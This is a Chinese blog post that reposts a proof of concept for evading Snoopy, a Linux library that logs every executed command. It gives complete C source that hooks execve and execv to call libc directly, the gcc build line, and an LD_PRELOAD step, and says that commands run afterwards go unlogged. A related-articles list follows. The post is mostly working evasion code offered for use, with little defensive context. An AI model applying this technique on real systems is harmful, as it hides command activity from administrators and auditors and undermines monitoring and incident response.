绕过Snoopy的记录功能

神棍先生 2018-05-07

PTR static void snoopy type

版权声明:本文可能为博主原创文章,若标明出处可随便转载。 https://blog.csdn.net/Jailman/article/details/80225963

不讲原理,感兴趣请看http://blog.rchapman.org/posts/Bypassing_snoopy_logging/,这个只适合老版本内核的Linux

查看是否有snoopy加载了

ldd `which ls`

输出类似如下就是snoopy被加载了

[ryan@buggy ~]# ldd `which ls`
        /usr/local/lib/snoopy.so (0x00002af2d1210000)
        librt.so.1 => /lib64/librt.so.1 (0x00002af2d1412000)
        libacl.so.1 => /lib64/libacl.so.1 (0x00002af2d161b000)
        libselinux.so.1 => /lib64/libselinux.so.1 (0x00002af2d1822000)
        libc.so.6 => /lib64/libc.so.6 (0x00002af2d1a3a000)
        libdl.so.2 => /lib64/libdl.so.2 (0x00002af2d1d91000)
        libpthread.so.0 => /lib64/libpthread.so.0 (0x00002af2d1f96000)
        /lib64/ld-linux-x86-64.so.2 (0x00002af2d0ff3000)
        libattr.so.1 => /lib64/libattr.so.1 (0x00002af2d21b1000)
        libsepol.so.1 => /lib64/libsepol.so.1 (0x00002af2d23b5000)

查看日志可以看到类似如下的内容

[ryan@buggy ~]# tail /var/log/secure
Apr 13 12:03:07 buggy snoopy[19511]: [uid:544 sid:10430 tty:/dev/pts/2 cwd:/home/ryan filename:/usr/bin/ldd]: ldd /bin/ls  [uid:544 sid:10430 tty:/dev/pts/2 cwd:/home/ryan filename:/usr/bin/ldd]: ldd /bin/ls 

建立bypass.c

/*
 * Proof of concept to bypass snoopy logging
 *
 * Many parts of the code came directly from the snoopy source itself.
 *
 * Ryan A. Chapman
 * Wed Apr 13 13:28:10 MDT 2011
 */

#define _GNU_SOURCE
#include <dlfcn.h>
#include <stdio.h>
#include <stdarg.h>
#include <stdlib.h>
#include <sys/types.h>
#include <syslog.h>
#include <string.h>
#include <errno.h>

#if defined(RTLD_NEXT)
#  define REAL_LIBC RTLD_NEXT
#else
#  define REAL_LIBC ((void *) -1L)
#endif

#define FN(ptr,type,name,args)  ptr = (type (*)args)dlsym (REAL_LIBC, name)
#define FN_HANDLE(handle, ptr,type,name,args)  ptr = (type (*)args)dlsym (handle, name)

int execve(const char *filename, char *const argv[], char *const envp[])
{
    Dl_info info;
    void *handle = dlopen("/lib64/libc.so.6", RTLD_NOW|RTLD_LOCAL);
    if(handle == NULL)
        handle = dlopen("/lib/libc.so.6", RTLD_NOW|RTLD_LOCAL);
    static int (*func)(const char *, char **, char **);

    FN_HANDLE(handle,func,int,"execve",(const char *, char **, char **));
    return (*func) (filename, (char**) argv, (char **) envp);
}

/* Put the libc version of execv back in place */
int execv(const char *filename, char *const argv[])
{
    Dl_info info;
    void *handle = dlopen("/lib64/libc.so.6", RTLD_NOW|RTLD_LOCAL);
    if(handle == NULL)
        handle = dlopen("/lib/libc.so.6", RTLD_NOW|RTLD_LOCAL);
    static int (*func)(const char *, char **);

    FN_HANDLE(handle,func,int,"execv",(const char *, char **));
    return (*func) (filename, (char **) argv);
}

编译

gcc -nostartfiles -shared -O3 -fomit-frame-pointer -fPIC bypass.c -obypass.so -ldl

加载模块

export LD_PRELOAD=/full/path/to/bypass.so
/bin/bash

之后的操作就不会被snoopy记录了。所以snoopy的作者是反对将其用来做安全审计工作的。

登录 后评论
下一篇
corcosa
8731人浏览
2019-10-08
相关推荐
用PHP抓取页面并分析
680人浏览
2017-11-22 15:38:00
snoopy 模拟表单提交(1)
1907人浏览
2016-05-12 13:34:29
采集
565人浏览
2017-11-17 16:39:00
snoopy
283人浏览
2010-07-23 11:01:00
php采集
521人浏览
2013-04-27 15:25:00
snoopy初探
1491人浏览
2016-03-24 13:16:38
php 解析html的工具 嵌入式
2148人浏览
2016-05-12 11:04:14
CI框架调用第三方类库
829人浏览
2015-12-25 10:44:00
PHP__采集类__Snoopy
1578人浏览
2015-12-20 17:46:00
rtx登录内网系统
601人浏览
2012-06-19 20:30:00
php的Snoopy类
390人浏览
2011-05-10 20:53:00
PHP抓取采集类snoopy介绍
434人浏览
2015-09-29 17:18:00
0
0
0
292